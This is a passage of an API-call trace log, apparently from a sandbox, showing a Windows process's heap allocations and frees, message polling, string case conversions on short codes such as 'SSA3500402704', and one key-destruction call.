[0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.801] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.801] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.803] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.803] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.803] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0254.803] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.804] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0254.804] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.804] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.804] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.804] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.804] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.804] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.804] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.805] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.805] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.805] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.806] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.806] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.806] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.806] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.806] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.806] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0254.807] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.807] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.808] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.808] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0254.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d9c0 [0254.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d9c0 | out: hHeap=0x25c0000) returned 1 [0254.812] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.812] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.813] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0254.813] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.813] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.814] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, 